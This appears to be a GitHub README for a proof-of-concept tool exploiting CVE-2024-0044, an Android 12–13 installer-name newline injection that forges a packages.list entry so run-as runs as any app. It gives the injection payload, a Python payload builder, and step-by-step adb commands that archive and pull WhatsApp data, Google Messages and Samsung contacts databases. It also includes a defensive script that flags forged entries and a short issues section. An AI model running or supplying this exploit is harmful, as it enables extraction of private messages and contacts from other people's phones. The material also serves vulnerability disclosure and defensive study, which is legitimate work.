CVE-2024-0044

CVE-2024-0044 is a high-severity vulnerability in the createSessionInternal function of PackageInstallerService.java, affecting Android 12, 12L and 13. The installer package name supplied when an install session is created is not properly validated, so an attacker with a local shell (for example over ADB) can include a newline in it. The installer name is written to /data/system/packages.list, and the text after the newline becomes a forged package entry that run-as accepts. The result is a "run-as any app" primitive: a shell running under the target application's UID, with read and write access to that application's private data directory. It is a local escalation of privilege that needs no user interaction, but it does require an ADB shell on a device with USB or wireless debugging enabled; the target application's data (messages, contacts) can then be copied off the device without root.

The vulnerability was discovered by Meta's security team.

The proof of concept was summarised and shared by Tiny Hack.

Details of the fix can be found in the Android Security Bulletin for March 2024.

Prerequisites

  1. Enable USB debugging on the phone and connect it to your machine with a USB cable, or use wireless debugging.
  2. Download any APK to your machine; the F-Droid client APK is used in the examples below.

How to use the tool

python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P selects the target package name you want to run as (for example com.whatsapp).

-A is the path of the APK that is pushed to /data/local/tmp on the device and installed with the crafted installer name.

Exploitation

Run the tool: python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

A payload.txt file like this will be generated

PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

The tool automates part of the process; the rest is manual. You can exit after the payload has been generated and run every command yourself, or continue with the instructions below. Note that the UID in the payload (10289 here) is the target package's UID on this particular device, so a payload generated on one device must not be reused on another.

Next, open an adb shell, paste the payload, and make sure the last command returns Success. The -i option records the given string as the installing package name; because the string contains a newline, the second line is written to /data/system/packages.list as an entry of its own, named victim and carrying the target application's UID.

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success
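As an added example (this is not the repository's own code), here is how the payload above can be built from what the device reports instead of hard-coding the UID. It parses the output of adb shell pm list packages -U (the sample output below is constructed; the package names and UIDs in it are assumptions) and emits the same two-line installer name the README shows. The field layout of the forged line is copied from the payload above; only the UID, the fake package name and the APK path are parameters.

```python
import re

# Constructed sample of `adb shell pm list packages -U` output. The package names
# and UIDs are assumptions for this example, not captured from a real device.
SAMPLE_PM_OUTPUT = """\
package:com.android.settings uid:1000
package:com.whatsapp uid:10289
package:org.fdroid.fdroid uid:10312
"""

PM_LINE = re.compile(r"^package:(\S+)\s+uid:(\d+)$")


def parse_package_uids(pm_output):
    """Map package name -> UID from `pm list packages -U` output."""
    uids = {}
    for line in pm_output.splitlines():
        m = PM_LINE.match(line.strip())
        if m:
            uids[m.group(1)] = int(m.group(2))
    return uids


def forged_packages_list_entry(target_uid, fake_name="victim"):
    """The line that ends up in /data/system/packages.list.

    Field layout follows the README payload: name, uid, debuggable flag (1, which is
    what makes run-as accept the entry), data directory, seinfo, gids, and the
    remaining fields exactly as in the original payload.
    """
    if not isinstance(target_uid, int) or target_uid < 10000:
        # Application UIDs start at 10000; refuse system UIDs as a sanity check
        # rather than emit a line that is not useful for this technique.
        raise ValueError(f"unexpected target uid {target_uid!r}")
    return (f"{fake_name} {target_uid} 1 /data/user/0 "
            f"default:targetSdkVersion=28 none 0 0 1 @null")


def build_payload(pm_output, target_package,
                  apk_path="/data/local/tmp/F-Droid.apk", fake_name="victim"):
    """Return the shell snippet the README shows as payload.txt.

    The installer name passed to `pm install -i` is "@null", a newline, and the
    forged entry; the newline is what turns one installer-name value into an
    extra line of packages.list.
    """
    uids = parse_package_uids(pm_output)
    if target_package not in uids:
        raise KeyError(f"{target_package} is not installed on the device")
    installer_name = "@null\n" + forged_packages_list_entry(uids[target_package], fake_name)
    return f'PAYLOAD="{installer_name}"\npm install -i "$PAYLOAD" {apk_path}\n'


if __name__ == "__main__":
    # Prints the same two-line payload the README shows for com.whatsapp / uid 10289.
    print(build_payload(SAMPLE_PM_OUTPUT, "com.whatsapp"), end="")
```

To use it against a real device, replace SAMPLE_PM_OUTPUT with the captured output of adb shell pm list packages -U and paste the returned snippet into an adb shell exactly as described above.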

Next, collect the WhatsApp data with the following commands:

pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Create a temporary directory: mkdir /data/local/tmp/wa/, owned by the shell user, under a location both the shell and the application UID can reach.

Create a placeholder for the archive: touch /data/local/tmp/wa/wa.tar, so the file exists as the shell user's and can later be pulled with adb.

Set wide-open permissions: chmod -R 0777 /data/local/tmp/wa/. The archive is written by the target application's UID, not the shell's, so without this tar fails with a permission error.

Switch user context: run-as victim. run-as looks up "victim" in /data/system/packages.list, finds the forged entry (flagged debuggable, UID 10289, data directory /data/user/0) and switches to that UID, which on this device is WhatsApp's; the prompt changes to /data/user/0, the forged data directory. If you get run-as: unknown package: victim instead, the forged line did not make it into packages.list.

Archive the target application's data: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp. The com.whatsapp directory under /data/user/0 is readable by WhatsApp's UID, so the whole private data directory is captured in the tarball.
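The run-as step above only works if the forged line actually landed in /data/system/packages.list in the shape run-as expects. The following Python is an added example, not part of the repository: it parses a packages.list in the format the payload shows (name, UID, debuggable flag, data directory, seinfo; later fields are ignored), reports whether run-as would accept a given name, and flags entries that look forged rather than installed: a name that is not a valid package name, a data directory that is not the package's own, and a debuggable entry sharing a UID with a different package. If your shell can read the file, feeding it adb shell cat /data/system/packages.list shows why run-as reports an unknown package; the same check also gives a defender a simple forensic indicator for this technique. The sample file contents are constructed and every name, UID and path in them is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of /data/system/packages.list; names, UIDs and paths are
# assumptions for the example. The last line is the entry the payload forges.
SAMPLE_PACKAGES_LIST = """\
com.android.settings 1000 0 /data/user/0/com.android.settings platform:privapp:targetSdkVersion=33 1023,3002 0 33 @system
com.whatsapp 10289 0 /data/user/0/com.whatsapp default:targetSdkVersion=33 3003 0 231805 com.android.vending
org.fdroid.fdroid 10312 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=28 3003 0 1020050 @null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null
"""

# An Android package name is two or more dot-separated Java identifiers.
PACKAGE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*)+$")


def parse_packages_list(text):
    """Parse the leading fields of each line: name, uid, debuggable flag, data dir, seinfo.
    Later fields vary between Android versions and are ignored here."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[1].isdigit():
            continue
        entries.append({
            "name": parts[0],
            "uid": int(parts[1]),
            "debuggable": parts[2] == "1",
            "data_dir": parts[3],
            "seinfo": parts[4],
        })
    return entries


def run_as_lookup(entries, name):
    """Simplified model of how run-as treats the name it is given: the entry must
    exist and be flagged debuggable. (The real run-as performs further checks on
    the UID and data directory that are not modelled here.) None means run-as
    would refuse; a missing entry is the 'unknown package' case."""
    for e in entries:
        if e["name"] == name and e["debuggable"]:
            return e
    return None


def suspicious_entries(entries):
    """Return {name: [reasons]} for entries that look forged rather than installed."""
    names_by_uid = defaultdict(set)
    for e in entries:
        names_by_uid[e["uid"]].add(e["name"])

    findings = {}
    for e in entries:
        reasons = []
        if not PACKAGE_NAME.match(e["name"]):
            reasons.append("name is not a valid package name")
        own_dir = re.compile(rf"^/data/(user/\d+|data)/{re.escape(e['name'])}$")
        if not own_dir.match(e["data_dir"]):
            reasons.append(f"data dir {e['data_dir']} is not the package's own directory")
        others = names_by_uid[e["uid"]] - {e["name"]}
        if others and e["debuggable"]:
            # Legitimate sharedUserId apps share a UID too, so only a debuggable
            # entry piggybacking on another package's UID is reported.
            reasons.append(f"debuggable entry shares uid {e['uid']} with {sorted(others)}")
        if reasons:
            findings[e["name"]] = reasons
    return findings


if __name__ == "__main__":
    parsed = parse_packages_list(SAMPLE_PACKAGES_LIST)
    print("run-as victim would", "succeed" if run_as_lookup(parsed, "victim") else "fail")
    for name, reasons in suspicious_entries(parsed).items():
        print(name, "->", "; ".join(reasons))
```

On the sample above only the victim line is reported, for all three reasons; the com.whatsapp line that shares its UID is not, because it is not debuggable.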

Finally pull the data

adb pull /data/local/tmp/wa/wa.tar

Extract the archive with 7z or any other tool that reads tar files.

You can use WhatsApp Chat Exporter to convert the databases to HTML.

This yields the WhatsApp data without root access on the device.

Pulling google messages

Just change the package name as follows

plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Downloads/F-Droid.apk

Follow the instructions above, replacing com.whatsapp with com.google.android.apps.messaging in the tar command. After pulling the wa.tar file, untar it and open the conversations database at com.google.android.apps.messaging/databases/bugle_db with sqlitebrowser or any other SQLite tool.

Pulling contacts

Tested on a Samsung device. On other devices, first check the package name of the contacts app or contacts provider (for example with adb shell pm list packages contacts).

plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

Follow the instructions above, archiving the directory you need in the tar command. After pulling the wa.tar file, untar it and open the contacts database at com.samsung.android.providers.contacts/databases/contacts2.db with sqlitebrowser or any other SQLite tool. The database contains the user's email accounts together with the contact list. Note that the tool targets the contacts app (com.samsung.android.app.contacts) while the database lives under the contacts provider's directory; that only works where the two run under the same UID, so if the provider directory is missing from your archive, target the provider package instead.


Issues

TAR file corruption

The downloaded tar file reports that it is corrupted, and the data in the tar is incomplete.

run-as doesn't seem to work on Realme/Oppo devices

I have tried this on Realme/Oppo devices, but it returns this error.

RE879EL1:/ $ run-as victim
run-as: unknown package: victim

I looked into the /data/system/packages.list file and found that the victim entry is not there (somehow it is getting trimmed out).
How can this be resolved?
